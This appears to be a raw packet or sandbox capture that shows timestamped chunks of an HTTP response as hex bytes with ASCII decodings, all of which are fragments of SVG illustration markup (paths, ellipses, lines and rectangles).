                                                                                                                                                                                                                                                                          2023-07-05 06:07:20 UTC1316INData Raw: 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 38 33 2e 36 32 2c 33 36 32 2e 32 38 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20
                                                                                                                                                                                                                                                                          Data Ascii: 94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.47,2.47,0,0,1,.18,3.33"/><path class="cls-9" d="M583.62,362.28a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path
                                                                                                                                                                                                                                                                          2023-07-05 06:07:20 UTC1332INData Raw: 39 22 20 64 3d 22 4d 33 33 33 2e 31 36 2c 33 31 2e 32 37 61 31 2e 35 39 2c 31 2e 35 39 2c 30 2c 30 2c 31 2d 2e 37 32 2c 32 2e 30 38 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 33 2c 32 34 2e 37 38 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 41 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 33 32 39 2e 31 2c 32 36 61 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c
                                                                                                                                                                                                                                                                          Data Ascii: 9" d="M333.16,31.27a1.59,1.59,0,0,1-.72,2.08,2.34,2.34,0,0,1-3.12-.88,2.24,2.24,0,0,1,.47-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M333,24.78a1.61,1.61,0,0,1-.73,2.09A2.34,2.34,0,0,1,329.1,26a2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:20 UTC1348INData Raw: 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 30 2e 36 31 2c 36 32 2e 37 39 61 31 2e 36 2c 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 38 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 30 2e 33 39 2c 35 36 2e 33 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35
                                                                                                                                                                                                                                                                          Data Ascii: 1,.15,2.67"/><path class="cls-9" d="M360.61,62.79a1.6,1.6,0,0,1-.73,2.08,2.34,2.34,0,0,1-3.12-.88,2.24,2.24,0,0,1,.47-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M360.39,56.3a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25
                                                                                                                                                                                                                                                                          2023-07-05 06:07:20 UTC1364INData Raw: 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 38 38 2e 30 35 2c 39 34 2e 33 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 38 37 2e 38 33 2c 38 37 2e 38 32 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d
                                                                                                                                                                                                                                                                          Data Ascii: .47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M388.05,94.3a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M387.83,87.82a1.61,1.61,0,0,1-
                                                                                                                                                                                                                                                                          2023-07-05 06:07:20 UTC1380INData Raw: 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 31 35 2e 34 39 2c 31 32 35 2e 38 32 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 41 32 2c 32 2c 30 2c 30 2c 31 2c 34 31 35 2c 31 32 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 31 35 2e 32 37 2c
                                                                                                                                                                                                                                                                          Data Ascii: .88,2.24,2.24,0,0,1,.47-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M415.49,125.82a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0A2,2,0,0,1,415,127"/><path class="cls-9" d="M415.27,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:20 UTC1396INData Raw: 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 34 32 2e 39 33 2c 31 35 37 2e 33 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64
                                                                                                                                                                                                                                                                          Data Ascii: 0,1-3.12-.88,2.24,2.24,0,0,1,.47-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M442.93,157.34a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d
                                                                                                                                                                                                                                                                          2023-07-05 06:07:20 UTC1412INData Raw: 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2c 32 2e 37 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 37 30 2e 33 37 2c 31 38 38 2e 38 36 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2c 32 2e 37 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c
                                                                                                                                                                                                                                                                          Data Ascii: 3,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.09,2.09,0,0,1,2.7,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M470.37,188.86a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.24,2.24,0,0,1,.48-2.7,2.09,2.09,0,0,1,2.7,0,2,2,0,0,1,.15,2.67"/><
                                                                                                                                                                                                                                                                          2023-07-05 06:07:20 UTC1428INData Raw: 20 64 3d 22 4d 34 38 35 2e 33 2c 34 35 2e 35 39 61 31 2e 36 32 2c 31 2e 36 32 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 39 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 38 35 2e 30 38 2c 33 39 2e 31 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30
                                                                                                                                                                                                                                                                          Data Ascii: d="M485.3,45.59a1.62,1.62,0,0,1-.73,2.09,2.36,2.36,0,0,1-3.12-.89,2.24,2.24,0,0,1,.48-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M485.08,39.1a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0
                                                                                                                                                                                                                                                                          2023-07-05 06:07:20 UTC1444INData Raw: 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 32 2e 37 34 2c 37 37 2e 31 31 61 31 2e 36 2c 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 38 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 32 2e 35 32 2c 37 30 2e 36 32 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32
                                                                                                                                                                                                                                                                          Data Ascii: ss="cls-9" d="M512.74,77.11a1.6,1.6,0,0,1-.73,2.08,2.34,2.34,0,0,1-3.12-.88,2.24,2.24,0,0,1,.48-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M512.52,70.62a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2
                                                                                                                                                                                                                                                                          2023-07-05 06:07:20 UTC1460INData Raw: 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 30 2e 31 38 2c 31 30 38 2e 36 33 61 31 2e 36 2c 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 38 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 30 2c 31 30 32 2e 31 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: 4,2.67"/><path class="cls-9" d="M540.18,108.63a1.6,1.6,0,0,1-.73,2.08,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M540,102.14a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:20 UTC1476INData Raw: 31 39 37 63 36 2e 37 35 2d 32 2e 37 31 2c 31 36 2e 31 31 2d 35 2e 36 2c 32 31 2e 37 35 2d 31 30 2e 31 33 4c 39 30 30 2e 31 36 2c 31 37 34 6c 34 2e 32 37 2d 37 2e 36 33 2c 32 2e 34 38 2d 32 38 2e 32 36 2d 32 33 2e 36 39 2c 31 34 2e 34 35 63 2d 34 2e 39 34 2c 33 2d 39 2e 38 35 2c 36 2e 31 32 2d 31 34 2e 38 34 2c 39 2e 30 36 2d 34 2e 38 33 2c 32 2e 38 34 2d 31 33 36 2e 33 2d 32 2e 35 31 2d 31 34 31 2e 38 37 2d 32 2e 31 37 6c 2d 38 33 2e 37 31 2c 35 63 2d 31 2e 38 37 2e 31 32 2d 33 32 2c 31 2e 31 36 2d 33 32 2e 31 33 2c 31 2e 39 34 5a 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 36 22 20 64 3d 22 4d 39 30 30 2e 31 36 2c 31 37 34 6c 34 2e 33 34 2d 35 2e 36 33 2c 32 2e 34 31 2d 33 30 2e 32 36 2d 32 33 2e 36 39 2c 31 34 2e 34 35 63 2d 34 2e 39
                                                                                                                                                                                                                                                                          Data Ascii: 197c6.75-2.71,16.11-5.6,21.75-10.13L900.16,174l4.27-7.63,2.48-28.26-23.69,14.45c-4.94,3-9.85,6.12-14.84,9.06-4.83,2.84-136.3-2.51-141.87-2.17l-83.71,5c-1.87.12-32,1.16-32.13,1.94Z"/><path class="cls-16" d="M900.16,174l4.34-5.63,2.41-30.26-23.69,14.45c-4.9
                                                                                                                                                                                                                                                                          2023-07-05 06:07:20 UTC1492INData Raw: 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 30 2c 2e 31 33 2e 37 38 2c 31 2e 39 34 2c 31 2e 39 34 2c 30 2c 30 2c 30 2c 2e 33 37 2e 36 36 2c 31 2e 37 35 2c 31 2e 37 35 2c 30 2c 30 2c 30 2c 2e 35 39 2e 34 35 2c 32 2c 32 2c 30 2c 30 2c 30 2c 31 2e 36 33 2c 30 2c 31 2e 37 35 2c 31 2e 37 35 2c 30 2c 30 2c 30 2c 2e 35 39 2d 2e 34 35 2c 31 2e 39 34 2c 31 2e 39 34 2c 30 2c 30 2c 30 2c 2e 33 37 2d 2e 36 36 41 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 30 2c 35 32 30 2e 33 34 2c 32 32 39 2e 30 35 5a 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 32 22 20 64 3d 22 4d 35 32 34 2c 32 32 36 2e 32 32 71 30 2c 2e 32 31 2c 30 2c 2e 34 38 63 30 2c 2e 31 38 2c 30 2c 2e 33 33 2c 30 2c 2e 34 35 68 30 61 31 2e 36 36 2c 31 2e 36 36 2c 30 2c 30 2c 31 2c 2e 32 39 2d 2e 34 32 2c 32
                                                                                                                                                                                                                                                                          Data Ascii: 2.5,2.5,0,0,0,.13.78,1.94,1.94,0,0,0,.37.66,1.75,1.75,0,0,0,.59.45,2,2,0,0,0,1.63,0,1.75,1.75,0,0,0,.59-.45,1.94,1.94,0,0,0,.37-.66A2.5,2.5,0,0,0,520.34,229.05Z"/><path class="cls-2" d="M524,226.22q0,.21,0,.48c0,.18,0,.33,0,.45h0a1.66,1.66,0,0,1,.29-.42,2
                                                                                                                                                                                                                                                                          2023-07-05 06:07:20 UTC1508INData Raw: 37 32 20 36 36 33 2e 35 36 20 33 31 34 2e 32 35 20 36 37 31 2e 32 31 20 33 31 39 2e 30 32 20 36 37 30 2e 36 35 20 33 34 38 2e 39 33 22 2f 3e 3c 6c 69 6e 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 35 22 20 78 31 3d 22 36 37 31 2e 32 31 22 20 79 31 3d 22 33 32 36 2e 31 32 22 20 78 32 3d 22 36 38 38 2e 37 31 22 20 79 32 3d 22 33 32 34 2e 32 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 36 22 20 64 3d 22 4d 36 36 39 2e 31 39 2c 33 31 33 2e 33 34 76 32 63 30 2c 31 2e 33 36 2c 33 2e 32 33 2c 32 2e 34 36 2c 37 2e 32 31 2c 32 2e 34 36 73 37 2e 32 31 2d 31 2e 31 2c 37 2e 32 31 2d 32 2e 34 36 76 2d 32 22 2f 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 36 37 36 2e 34 22 20 63 79 3d 22 33 31 33 2e 33 34 22
                                                                                                                                                                                                                                                                          Data Ascii: 72 663.56 314.25 671.21 319.02 670.65 348.93"/><line class="cls-75" x1="671.21" y1="326.12" x2="688.71" y2="324.26"/><path class="cls-76" d="M669.19,313.34v2c0,1.36,3.23,2.46,7.21,2.46s7.21-1.1,7.21-2.46v-2"/><ellipse class="cls-38" cx="676.4" cy="313.34"
                                                                                                                                                                                                                                                                          2023-07-05 06:07:20 UTC1524INData Raw: 28 2d 33 38 2e 30 37 29 22 2f 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 37 22 20 63 78 3d 22 38 34 38 2e 36 34 22 20 63 79 3d 22 32 31 33 2e 34 35 22 20 72 78 3d 22 31 2e 32 22 20 72 79 3d 22 31 2e 35 34 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 34 38 2e 39 35 20 35 36 38 2e 37 35 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 2f 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 37 22 20 63 78 3d 22 38 34 38 2e 36 34 22 20 63 79 3d 22 32 31 38 2e 37 34 22 20 72 78 3d 22 32 2e 32 34 22 20 72 79 3d 22 32 2e 38 38 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 34 35 2e 36 39 20 35 36 39 2e 38 38 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 2f 3e 3c 65 6c 6c 69
                                                                                                                                                                                                                                                                          Data Ascii: (-38.07)"/><ellipse class="cls-97" cx="848.64" cy="213.45" rx="1.2" ry="1.54" transform="translate(48.95 568.75) rotate(-38.07)"/><ellipse class="cls-97" cx="848.64" cy="218.74" rx="2.24" ry="2.88" transform="translate(45.69 569.88) rotate(-38.07)"/><elli
                                                                                                                                                                                                                                                                          2023-07-05 06:07:20 UTC1540INData Raw: 2e 32 39 2c 30 2c 30 2c 31 2c 2e 33 36 2d 2e 33 31 41 31 2e 36 37 2c 31 2e 36 37 2c 30 2c 30 2c 31 2c 38 31 35 2e 36 39 2c 32 35 31 2e 37 38 5a 6d 2d 2e 30 39 2d 31 2e 33 39 63 2e 34 37 2e 33 39 2e 34 39 2e 34 36 2e 34 39 2e 36 73 2d 2e 31 35 2e 34 2d 2e 33 36 2e 33 34 2d 2e 31 33 2d 2e 30 35 2d 2e 34 36 2d 2e 33 34 63 30 2d 2e 30 35 2d 2e 32 38 2d 2e 32 35 2d 2e 33 32 2d 2e 33 61 2e 33 2e 33 2c 30 2c 30 2c 31 2d 2e 30 39 2d 2e 32 33 2e 33 32 2e 33 32 2c 30 2c 30 2c 31 2c 2e 33 33 2d 2e 33 33 43 38 31 35 2e 32 36 2c 32 35 30 2e 31 34 2c 38 31 35 2e 33 34 2c 32 35 30 2e 31 38 2c 38 31 35 2e 36 2c 32 35 30 2e 33 39 5a 6d 31 2e 31 37 2e 34 36 61 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 32 33 2e 36 36 63 30 2c 2e 32 31 2d 2e 32 31 2e 32 38 2d 2e 34
                                                                                                                                                                                                                                                                          Data Ascii: .29,0,0,1,.36-.31A1.67,1.67,0,0,1,815.69,251.78Zm-.09-1.39c.47.39.49.46.49.6s-.15.4-.36.34-.13-.05-.46-.34c0-.05-.28-.25-.32-.3a.3.3,0,0,1-.09-.23.32.32,0,0,1,.33-.33C815.26,250.14,815.34,250.18,815.6,250.39Zm1.17.46a2.37,2.37,0,0,1,.23.66c0,.21-.21.28-.4
                                                                                                                                                                                                                                                                          2023-07-05 06:07:20 UTC1556INData Raw: 2e 39 31 6c 2e 31 34 2c 32 2e 32 37 61 33 2e 34 32 2c 33 2e 34 32 2c 30 2c 30 2c 30 2d 33 2e 36 31 2e 30 39 63 2d 32 2c 31 2e 32 31 2d 33 2e 32 38 2c 33 2e 37 31 2d 33 2e 37 2c 33 2e 34 37 73 2d 2e 32 33 2d 32 2e 31 32 2c 31 2e 33 39 2d 33 2e 35 31 53 39 32 32 2e 36 36 2c 32 38 34 2e 35 39 2c 39 32 35 2e 32 35 2c 32 38 34 2e 39 31 5a 22 2f 3e 3c 72 65 63 74 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 31 33 22 20 78 3d 22 39 33 30 2e 31 36 22 20 79 3d 22 32 38 35 2e 32 39 22 20 77 69 64 74 68 3d 22 33 2e 37 35 22 20 68 65 69 67 68 74 3d 22 33 2e 31 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 38 36 34 2e 30 36 20 35 37 33 2e 36 37 29 20 72 6f 74 61 74 65 28 2d 31 38 30 29 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31
                                                                                                                                                                                                                                                                          Data Ascii: .91l.14,2.27a3.42,3.42,0,0,0-3.61.09c-2,1.21-3.28,3.71-3.7,3.47s-.23-2.12,1.39-3.51S922.66,284.59,925.25,284.91Z"/><rect class="cls-113" x="930.16" y="285.29" width="3.75" height="3.1" transform="translate(1864.06 573.67) rotate(-180)"/><path class="cls-1
                                                                                                                                                                                                                                                                          2023-07-05 06:07:20 UTC1572INData Raw: 30 38 2d 33 2e 31 33 63 2d 31 2e 31 35 2d 34 2e 31 33 2d 35 2e 34 32 2d 34 2e 38 2d 39 2d 33 2e 36 34 2d 2e 39 2e 32 39 2d 33 2e 31 37 2c 31 2d 33 2e 34 35 2c 32 73 31 2e 31 32 2c 31 2e 36 2c 31 2e 33 33 2c 32 2e 34 37 63 2e 32 37 2c 31 2e 31 32 2d 2e 35 39 2c 32 2e 31 39 2e 33 34 2c 33 2e 32 36 61 33 2c 33 2c 30 2c 30 2c 30 2c 2e 37 36 2e 36 2c 36 2e 35 38 2c 36 2e 35 38 2c 30 2c 30 2c 30 2c 32 2e 33 35 2c 31 2e 30 37 2c 37 2e 32 38 2c 37 2e 32 38 2c 30 2c 30 2c 30 2c 32 2e 33 37 2d 2e 30 39 6c 31 2e 38 37 2d 2e 32 37 61 35 2e 32 34 2c 35 2e 32 34 2c 30 2c 30 2c 30 2c 32 2e 35 38 2d 2e 38 35 41 32 2e 39 31 2c 32 2e 39 31 2c 30 2c 30 2c 30 2c 39 30 35 2e 35 37 2c 32 35 33 2e 35 32 5a 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 33 34 22
                                                                                                                                                                                                                                                                          Data Ascii: 08-3.13c-1.15-4.13-5.42-4.8-9-3.64-.9.29-3.17,1-3.45,2s1.12,1.6,1.33,2.47c.27,1.12-.59,2.19.34,3.26a3,3,0,0,0,.76.6,6.58,6.58,0,0,0,2.35,1.07,7.28,7.28,0,0,0,2.37-.09l1.87-.27a5.24,5.24,0,0,0,2.58-.85A2.91,2.91,0,0,0,905.57,253.52Z"/><path class="cls-134"
